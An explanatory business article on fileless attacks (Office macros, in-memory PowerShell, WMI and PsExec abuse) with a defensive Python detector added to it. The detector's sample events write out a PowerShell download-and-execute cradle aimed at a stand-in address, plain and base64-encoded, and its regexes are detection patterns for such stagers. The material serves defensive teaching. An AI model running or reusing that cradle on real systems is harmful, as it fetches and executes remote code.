5 Things You Need to Know About the New (and Scary) Wave of 'File-less' Cyber Attacks

Companies are bracing for cyber attacks that use those companies' own system tools against them -- and keep their IT professionals up at night.

By Mike Duffy

Opinions expressed by Entrepreneur contributors are their own.

In the wake of the Equifax breach and the global WannaCry ransomware outbreak earlier this year, anxiety about cybersecurity is at an all-time high. Companies are feeling more pressure to invest in new policies and products that can keep their sensitive data safe.

Yet even as they increase their security budgets, many organizations harbor real concerns as to whether any existing technology can help them keep up with the rapidly evolving nature of today's threats.

In particular, they're worried about the steadily growing number of attacks designed to gain access to their systems and silently infect them, without ever downloading malicious programs or leaving behind any obvious trace.

These attacks go by several names. "Fileless attacks" is the most common, but "non-malware attacks" and "living-off-the-land attacks" are also used. The bottom line is that these attacks are specifically designed to evade detection, primarily by turning a victim company's trusted software and system tools against it. As a result, they are quickly becoming the number-one threat keeping IT and security professionals up at night.

To clarify what actually constitutes a fileless attack and explain how it can work, here are five things every business leader should know:

1. Fileless attacks exploit a fundamental gap in traditional endpoint security.

Traditionally, cyber attacks involving malware have revolved around attackers gaining access to a victim's computer (typically by either exploiting a software vulnerability or tricking the victim into downloading something he or she shouldn't), and then installing an executable file (the "payload") that does the damage.

The problem with this approach, from an attacker's perspective, is that antivirus solutions are built to scan and block suspicious files that land on the computer. By never writing a malicious file to disk, attackers simply bypass these solutions. All they need to do is hijack otherwise legitimate system tools and trusted applications to do their dirty work for them.

2. There are a variety of fileless techniques attackers can use.

At a high level, an attack can be broken down into two primary stages: the initial compromise that gives attackers access to a target system, and the post-exploitation activity they conduct once they are inside. Attackers can use fileless techniques during one or both of these stages to accomplish their goals while evading traditional antivirus software and even next-generation, machine-learning-powered products.

To gain initial access, attackers often use exploits that take advantage of flaws in software the victim is already running. The Equifax breach is a recent example: attackers exploited a vulnerability in the company's unpatched version of Apache Struts and used it to execute malicious commands.

Exploiting vulnerable applications and injecting code into legitimate system processes are both popular fileless techniques for gaining access and execution on a machine without being noticed.

Once the initial compromise is complete, attackers can keep avoiding detection by abusing powerful system-administration tools like PowerShell, PsExec and Windows Management Instrumentation (WMI). Because these tools have legitimate uses, they let attackers hide in plain sight while they escalate privileges, move laterally through the network and achieve persistence, for example by making changes to the registry.

3. A fileless attack can involve files.

Before going any further, we should dispel one of the most common misunderstandings surrounding fileless attacks -- they often do involve files, especially in the initial compromise stage of the attack. The primary difference is that these files aren't malicious executables, but instead files like Microsoft Office documents.

The challenge from a traditional endpoint security perspective is that there is nothing inherently malicious about these files on their own, so scanning them won't necessarily raise any red flags. That makes them the perfect vehicles to kick off an attack.

For example, an attack may begin with an employee being tricked into opening a Word document received in a phishing email; opening it inadvertently activates a macro or script embedded inside.

That macro or script then launches PowerShell, a legitimate framework built into Windows for automating system-administration tasks. From there, the attacker uses PowerShell to execute malicious code directly in memory, making the attack truly fileless from this point forward.

Because the individual components of such an attack aren't malicious on their own, security solutions need to be able to observe how they behave together, and recognize when a chain of behaviors from otherwise legitimate programs constitutes an attack.
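The chain just described is exactly what an endpoint sensor can correlate even though no single step is malicious. As an added example (this is not code from the article, from Barkly, or from any product it mentions), the following Python reads constructed process-creation records (image, parent image, command line, as Sysmon Event ID 1 or a similar sensor would record them) and flags three of the chains discussed in sections 2 and 3: an Office application spawning a script host, the WMI provider host or the PsExec service spawning a script host, and a PowerShell command line that combines several stager traits, decoding the -EncodedCommand argument so that markers hidden behind base64 still count. The process names, rule names, command lines and the 192.0.2.10 address are all constructed for illustration.

```python
"""Behavior-chain detection over process-creation events.

Added example (not from the article or Barkly). Every event below is constructed:
a minimal record of the kind an endpoint sensor or Sysmon Event ID 1 emits
(new process image, parent image, full command line).
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    image: str         # basename of the new process, e.g. "powershell.exe"
    parent_image: str  # basename of the process that spawned it
    cmdline: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# Processes that run commands on behalf of remote admin tools: the WMI provider
# host and the service PsExec installs on the target machine.
REMOTE_ADMIN_PARENTS = {"wmiprvse.exe", "psexesvc.exe"}

# Command-line traits typical of in-memory PowerShell stagers. Any single one
# has legitimate uses; the rule below only fires when several co-occur.
PS_MARKERS = [
    (re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\b"), "encoded command"),
    (re.compile(r"(?i)(?:^|\s)-(?:nop|noprofile)\b"), "no profile"),
    (re.compile(r"(?i)(?:^|\s)-(?:w|win|windowstyle)\s+hidden\b"), "hidden window"),
    (re.compile(r"(?i)\b(?:IEX|Invoke-Expression)\b"), "Invoke-Expression"),
    (re.compile(r"(?i)DownloadString|Net\.WebClient|Invoke-WebRequest|\biwr\b"), "web download"),
    (re.compile(r"(?i)FromBase64String"), "base64 decode"),
]
ENC_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def ps_encode(script: str) -> str:
    """Encode a script the way 'powershell -EncodedCommand' expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the plaintext of an -EncodedCommand argument, or None if absent or undecodable."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def powershell_markers(cmdline: str):
    """Markers present in the visible command line plus its decoded -enc payload, if any."""
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded:
        text += " " + decoded
    return [label for rx, label in PS_MARKERS if rx.search(text)]


def detect(events):
    """Return (pid, rule, detail) findings from parent/child pairs and command-line traits."""
    findings = []
    for ev in events:
        image, parent = ev.image.lower(), ev.parent_image.lower()
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            findings.append((ev.pid, "office-spawns-script-host", f"{parent} -> {image}"))
        if parent in REMOTE_ADMIN_PARENTS and image in SCRIPT_HOSTS:
            findings.append((ev.pid, "remote-admin-tool-spawns-script-host", f"{parent} -> {image}"))
        if image in {"powershell.exe", "pwsh.exe"}:
            markers = powershell_markers(ev.cmdline)
            if len(markers) >= 2:  # one trait alone is too common to alert on
                findings.append((ev.pid, "suspicious-powershell-cmdline", ", ".join(markers)))
    return findings


# Constructed sample: a macro-launched stager, a benign admin script, a WMI-launched
# download cradle and a PsExec session. 192.0.2.10 is a documentation-only address.
STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage1')"
SAMPLE_EVENTS = [
    ProcEvent(1001, "winword.exe", "explorer.exe",
              r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "invoice.docm"'),
    ProcEvent(1002, "powershell.exe", "winword.exe",
              f"powershell.exe -nop -w hidden -enc {ps_encode(STAGE1)}"),
    ProcEvent(1003, "powershell.exe", "explorer.exe",
              r"powershell.exe -File C:\scripts\nightly-backup.ps1"),
    ProcEvent(1004, "powershell.exe", "wmiprvse.exe", f'powershell.exe -nop -c "{STAGE1}"'),
    ProcEvent(1005, "cmd.exe", "psexesvc.exe", "cmd.exe /c whoami"),
]

if __name__ == "__main__":
    for pid, rule, detail in detect(SAMPLE_EVENTS):
        print(f"pid={pid} {rule}: {detail}")
```

Running it reports the macro chain (1002) and the WMI and PsExec chains (1004, 1005) but stays silent on the nightly backup script (1003), which is the distinction this section is making: the same powershell.exe is benign or hostile depending on who launched it and what it was told to do. A real deployment would read the sensor's event stream instead of SAMPLE_EVENTS and add grandparent, user and host context; -File on its own is deliberately not a marker, because that is how legitimate administration normally runs.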

4. Fileless attacks are on the rise.

In truth, many of the techniques fileless attacks use have been around for some time. In-memory exploits, for example, date back to the prolific Code Red and SQL Slammer worms of the early 2000s. But the creation and widespread distribution of easy-to-use attack tools and exploit kits has made them far more prevalent. In particular, penetration-testing frameworks like Metasploit and PowerSploit are being abused because they provide ready-made in-memory payloads and post-exploitation modules that can be dropped into any attack.

As a result, these techniques are no longer limited to sophisticated hackers and nation-state espionage groups. They are readily available to the average cyber criminal, and the number of fileless attacks on companies has risen dramatically. Once considered fringe cases, fileless attacks were reported by nearly a third of the organizations polled in the SANS 2017 Threat Landscape survey.

5. Fileless attacks can be stopped.

While fileless techniques can be extremely difficult to detect, there are things you can do to protect your business and reduce your risk. A good first step is to disable admin tools your organization isn't actively using or, at the least, restrict their permissions and functionality. Because so many fileless techniques rely on it, PowerShell should be at the top of your list to consider limiting or disabling altogether; in practice that usually means restricting which users and systems may run it and logging what it executes, since removing it outright breaks legitimate administration.

Likewise, disabling Office macros takes away one of the most common launching points for fileless attacks. Operating systems and applications should be patched as religiously as possible, and when patching isn't feasible, those systems should be isolated to keep a potential attack from spreading.

With no files to scan, detecting and blocking fileless attacks ultimately comes down to your IT department's ability to identify malicious activity and behaviors on the endpoint -- ideally before any damage is done. There are newer endpoint solutions that can do this and stop fileless attacks in real time, before they compromise the device. IT and security leaders should investigate their options to determine the right solution for keeping their organizations safe.

Mike Duffy

CEO, Barkly

Mike Duffy is the CEO of Barkly, the endpoint protection platform that delivers protection with few false positives and simple management. Prior to founding Barkly, Duffy led OpenPages, a leading provider of GRC solutions for the enterprise; the company achieved record growth and global market presence, resulting in its acquisition by IBM. Before OpenPages, Duffy was general manager for Intel's wide area networking business and senior VP of worldwide sales and marketing at Shiva Corporation.
